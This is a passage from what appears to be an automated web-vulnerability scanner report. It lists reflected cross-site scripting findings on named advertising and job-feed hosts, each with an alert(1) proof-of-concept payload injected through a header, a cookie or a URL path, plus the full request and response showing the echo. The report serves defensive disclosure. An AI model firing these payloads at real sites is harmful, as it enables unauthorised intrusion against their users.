This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /imp?Z=728x90&s=814544&r=0&_salt=1883775268&u=http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933%26keyword%3Dwa%2Fnews_home HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=3bf24'-alert(1)-'b7c07369c41
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 08-Sep-2011 14:17:09 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 07 Sep 2011 14:17:09 GMT
Content-Length: 618

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=728x90&referrer=http://www.google.com/search%3Fhl=en%26q=3bf24'-alert(1)-'b7c07369c41&inv_code=814544&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90%26s%3D814544%26r%3D0%26_salt%3D1883775268%26u%3Dhttp%253A%252F%252Foptimized-by
...[SNIP]...

2.77. http://feeds.mycareer.com.au/crossdomain.xml [REST URL parameter 1] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://feeds.mycareer.com.au
Path:	/crossdomain.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 93b1b'style%3d'x%3aexpression(alert(1))'b331857517d was submitted in the REST URL parameter 1. This input was echoed as 93b1b'style='x:expression(alert(1))'b331857517d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /crossdomain.xml93b1b'style%3d'x%3aexpression(alert(1))'b331857517d HTTP/1.1
Host: feeds.mycareer.com.au
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/2878385/jb_180x60_190411.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 517
Content-Type: text/html; charset=utf-8
Location: http://syndication.mycareer.com.au/crossdomain.xml93b1b'style='x:expression(alert(1))'b331857517d
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Wed, 07 Sep 2011 14:18:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-AU" lang="en-AU"><head
...[SNIP]...
<a href='http://syndication.mycareer.com.au/crossdomain.xml93b1b'style='x:expression(alert(1))'b331857517d'>
...[SNIP]...

2.78. http://feeds.mycareer.com.au/jobresults [REST URL parameter 1] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://feeds.mycareer.com.au
Path:	/jobresults

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4bedc'style%3d'x%3aexpression(alert(1))'3c198456447 was submitted in the REST URL parameter 1. This input was echoed as 4bedc'style='x:expression(alert(1))'3c198456447 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /4bedc'style%3d'x%3aexpression(alert(1))'3c198456447?s=102&state=nsw&c=3&s_cid=597799&format=xml HTTP/1.1
Host: feeds.mycareer.com.au
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/2878385/jb_180x60_190411.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 546
Content-Type: text/html; charset=utf-8
Location: http://syndication.mycareer.com.au/4bedc'style='x:expression(alert(1))'3c198456447?s=102&state=nsw&c=3&s_cid=597799&format=xml
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Wed, 07 Sep 2011 14:20:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-AU" lang="en-AU"><head
...[SNIP]...
<a href='http://syndication.mycareer.com.au/4bedc'style='x:expression(alert(1))'3c198456447?s=102&state=nsw&c=3&s_cid=597799&format=xml'>
...[SNIP]...

2.79. http://optimized-by.rubiconproject.com/a/7725/12338/21770-15.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7725/12338/21770-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ee5d"-alert(1)-"91ff5e258ee was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/7725/12338/21770-15.js?cb=721461&keyword=ndm|home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; csi15=1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1; ruid=9ee5d"-alert(1)-"91ff5e258ee; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=7725/12338; rdk2=0; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:28 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:14:28 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588dd8e11c55ed6b14ad2; expires=Wed, 07-Sep-2011 15:14:28 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^129; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63931; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3239

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182366"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=9ee5d"-alert(1)-"91ff5e258ee\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.80. http://optimized-by.rubiconproject.com/a/7725/12338/21770-2.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7725/12338/21770-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa71f"-alert(1)-"0030f063de1 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/7725/12338/21770-2.js?cb=69135394&keyword=ndm|home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=aa71f"-alert(1)-"0030f063de1; csi2=1295153.js^1^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; csi15=1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:19 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:14:19 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Wed, 07-Sep-2011 15:14:19 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12338^9; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63940; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3239

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182363"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=aa71f"-alert(1)-"0030f063de1\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.81. http://optimized-by.rubiconproject.com/a/7725/12338/22678-15.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7725/12338/22678-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63b2e"-alert(1)-"a79f1d07a25 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/7725/12338/22678-15.js?cb=9938969&keyword=ndm|business.businessold HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=63b2e"-alert(1)-"a79f1d07a25; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; ses15=12338^10&12590^8; rdk=7725/12338; rdk2=0; ses2=12338^16&12590^6; csi2=3165011.js^3^1315404895^1315405144&3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:32:15 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:32:15 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588ddd34dd9206cdecba9; expires=Wed, 07-Sep-2011 15:32:15 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^96&12590^119; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=62864; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3199

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182366"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=63b2e"-alert(1)-"a79f1d07a25\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.82. http://optimized-by.rubiconproject.com/a/7725/12338/22678-2.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7725/12338/22678-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb08b"-alert(1)-"f87da27032a was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/7725/12338/22678-2.js?cb=89263094&keyword=ndm|business.businessold HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=bb08b"-alert(1)-"f87da27032a; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3165011.js^2^1315404895^1315404918&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; ses15=12338^10&12590^8; rdk=7725/12338; rdk2=0; ses2=12338^15&12590^6

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:31:54 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:31:54 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=04e8588ddb95b3c4623aa79e6; expires=Wed, 07-Sep-2011 15:31:54 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=4e8588dd3e9c0c4d453ad2c4^&12338^12&12590^6; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=62885; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3199

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182363"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=bb08b"-alert(1)-"f87da27032a\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.83. http://optimized-by.rubiconproject.com/a/7725/12338/22682-15.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7725/12338/22682-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ca7d"-alert(1)-"738fbc0fe4e was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/7725/12338/22682-15.js?cb=99484313&keyword=ndm|news.weather HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://weather.news.com.au/wa/perth/perth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=5ca7d"-alert(1)-"738fbc0fe4e; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; rdk=7856/12590; rdk2=0; ses2=12338^3&12590^1; csi2=3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; cd=false; au=GSAE3LG5-KKTN-10.208.77.156; lm="7 Sep 2011 14:14:35 GMT"

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:07 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:15:07 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Wed, 07-Sep-2011 15:15:07 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^41&12590^3; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63892; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3211

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182366"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=5ca7d"-alert(1)-"738fbc0fe4e\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.84. http://optimized-by.rubiconproject.com/a/7725/12338/22682-2.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7725/12338/22682-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8e59"-alert(1)-"1786733ad33 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/7725/12338/22682-2.js?cb=61189778&keyword=ndm|news.weather HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://weather.news.com.au/wa/perth/perth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=b8e59"-alert(1)-"1786733ad33; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rdk15=0; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; rdk=7725/12338; rdk2=0; ses2=12338^2

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:49 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:14:49 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Wed, 07-Sep-2011 15:14:49 GMT; max-age=10; path=/; domain=.rubiconproject.com
